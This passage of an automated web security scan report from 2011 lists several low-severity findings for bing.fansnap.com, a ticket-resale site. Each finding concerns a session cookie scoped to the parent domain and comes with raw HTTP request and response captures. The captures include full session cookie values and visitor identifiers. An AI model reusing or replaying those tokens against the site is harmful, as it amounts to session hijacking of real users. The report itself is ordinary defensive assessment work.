User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DD%2F96GBjoLb2Zmc2V0af6QnQ%3D%3D--887aa4237234bb536971e58d8deef758bed09b0b

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:33:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 1267
ETag: "b1257b01a53ef99693d765e3a17f07e5"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4D5MReHBjoLb2Zmc2V0af6QnQ%3D%3D--bd9b40f18e2d6dc1d8e22c6446686fa9fe2c928f; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 148442
Connection: close
Content-Type: application/json; charset=utf-8

{"row_data":[{"attr":{"priceRange":{"min":220,"max":220},"salePriceRange":{"min":200,"max":200},"compCnt":1,"tixSetCnt":1,"qty":2,"sum":220,"sectionList":{"keys":{"89193":1}}},"markableData":{"geomId"
...[SNIP]...

13.10. http://bing.fansnap.com/seats/ajax/get_summary_data previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/seats/ajax/get_summary_data

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BdD%2FWGBjoLb2Zmc2V0af6QnQ%3D%3D--79d72df7e350a03720c4d1b91fdb01c069f1fe55; domain=fansnap.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seats/ajax/get_summary_data?event_ids[]=389669&use_ids=true&abppc=false&bfl=true&ps=false&ugc_enabled=true&exclude_brokers=629&map_type=interactive&get_geom=true&get_row=false HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DoLqSGBjoLb2Zmc2V0af6QnQ%3D%3D--ba45fc2687ffe9128b4ed829643a0bb02de5bef2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:33:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 1207
ETag: "53dbe6041c02cd63a984397ab8771445"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BdD%2FWGBjoLb2Zmc2V0af6QnQ%3D%3D--79d72df7e350a03720c4d1b91fdb01c069f1fe55; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 64893
Connection: close
Content-Type: application/json; charset=utf-8

{"area_data":{"venue":{"attr":{"compCnt":424,"tixSetCnt":1306,"qty":3573}},"areas":[{"attr":{"priceRange":{"min":50,"max":825},"salePriceRange":{"min":50,"max":750},"compCnt":322,"tixSetCnt":556,"qty"
...[SNIP]...

13.11. http://bing.fansnap.com/seats/ajax/get_tickets_data previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/seats/ajax/get_tickets_data

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DI8uSGBjoLb2Zmc2V0af6QnQ%3D%3D--dc840df0a17875b9fb6b0de95b7e98800627c2f7; domain=fansnap.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seats/ajax/get_tickets_data?ch=bing&order=salePrice&dir=asc&perpage=75&page=1&event_ids[]=389669&base_price=true&ugc_enabled=true&exclude_brokers=629&mrkrs=true& HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DoLqSGBjoLb2Zmc2V0af6QnQ%3D%3D--ba45fc2687ffe9128b4ed829643a0bb02de5bef2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:33:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 506
ETag: "70bf5bf8b3c509089f4acd0e0252f004"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DI8uSGBjoLb2Zmc2V0af6QnQ%3D%3D--dc840df0a17875b9fb6b0de95b7e98800627c2f7; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 61856
Connection: close
Content-Type: application/json; charset=utf-8

{"sets":[{"attr":{"key2":"f5b8116b2e","areaName":"Concourse 3 345","sectionName":"Concourse 3 345","rowName":"11","aId":6420,"sId":89301,"rId":1285632,"split":"2","eventId":389669,"qty":2,"tixSetCnt":
...[SNIP]...

13.12. http://bing.fansnap.com/seats/ajax/get_vfs_data previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/seats/ajax/get_vfs_data

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4Df7saGBjoLb2Zmc2V0af6QnQ%3D%3D--615873154c6872e1f19a93062453dfc3552c4bd5; domain=fansnap.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seats/ajax/get_vfs_data?vid=6119&ch=bing&cat=21600 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DoLqSGBjoLb2Zmc2V0af6QnQ%3D%3D--ba45fc2687ffe9128b4ed829643a0bb02de5bef2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:33:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 9
ETag: "99914b932bd37a50b983c5e7c90ae93b"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4Df7saGBjoLb2Zmc2V0af6QnQ%3D%3D--615873154c6872e1f19a93062453dfc3552c4bd5; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 2
Connection: close
Content-Type: application/json; charset=utf-8

{}

13.13. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

